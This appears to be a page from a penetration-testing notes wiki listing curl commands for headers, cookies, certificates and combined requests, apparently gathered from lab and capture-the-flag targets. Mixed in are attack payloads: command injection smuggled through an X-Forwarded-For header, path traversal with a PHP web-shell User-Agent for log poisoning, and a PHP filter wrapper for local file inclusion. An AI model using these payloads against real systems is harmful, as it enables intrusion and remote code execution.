Page cover
Edit

Curl Commands

Requests
Send POST request
curl -d "enter data here" http://IP:PORT
Retrieve Headers + body
curl -i https://example.com
Retrieve Only Headers
curl -I https://example.com
Manipulate Headers
curl -H 'HEADER:VALUE' https://example.com
Set User-Agent header
curl https://example.com -A 'Mozilla/5.0'
Credentials
curl -u user:pass https://example.com
Credentials Within URL
curl http://username:password@example.com:PORT
Cookies
Set Specific Cookie
curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://www.example.net:PORT
Save Cookie in to a file
curl -X POST -d "flag=UHC{F1rst_5tep_2_Qualify}" -c cookies.txt -v http://10.10.11.128/challenge.php
Use cookie from the file
curl -H "X-FORWARDED-FOR: 1.1.1.1; ping -c 1 10.10.16.7;" -b cookies.txt -v http://10.10.11.128/firewall.php
Certificates
Skip SSL Certificate validation
curl -k -v https://example.com
Specify a CA file
curl --cacert /path/to/ca-cert.pem https://secure.example.com
Specify a CA directory
curl --capath /path/to/cacerts https://secure.example.com
Specify a Client Certificate
curl -E /path/to/client-cert.pem https://secure.example.com
Specify the Certificate format
curl -E /path/to/client-cert.pem --cert-type PEM|DER|ENG https://secure.example.com
Skip SSL + verbose + Client Certificate
curl -k -v -E /path/to/client_certificate.pem https://example.com
Skip SSL + Verbose + Specific Certificate
curl -k -v --cacert /path/to/ca_certificate.crt https://example.com
Skip SSL + verbose + Client Certificate & Key
curl -k -v --cert client_cert_and_key.pem --cert-type PEM https://test.me
Combinations
Stealth + SSL Skip + Full details
curl -s -k -v -i IP
Skip SSL + Verbose + http2
curl -k -v --http2 <URL>
Stealth + Path Traversal + PHP Revshell Header
curl -s "http://83.136.249.227:31647/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log" -A "<?php system($_GET['cmd']); ?>"
POST + Key-Value pairs Content Header
curl http://example.net:44626/example.php7 -X POST -d 'username=harry' -H 'Content-Type: application/x-www-form-urlencoded'
Loop Multiple Queries
for i in {1..100}; do echo -n "Post $i: "; curl -s http://enterprise.htb/wp-content/plugins/lcars/lcars_dbpost.php?query=$i | tr -s '\n'; done  | tee post-name-list
Wrapper + base64 Encode + Regex
curl http://94.237.55.12:38697/index.php\?language\=php://filter/read\=convert.base64-encode/resource\=configure |  awk 'BEGIN { body=0 } /^$/ { body=1 } body { print }' | grep -o '[A-Za-z0-9+/=]\{20,\}'
PreviousWeb ReconnaissanceNextDorks

Last updated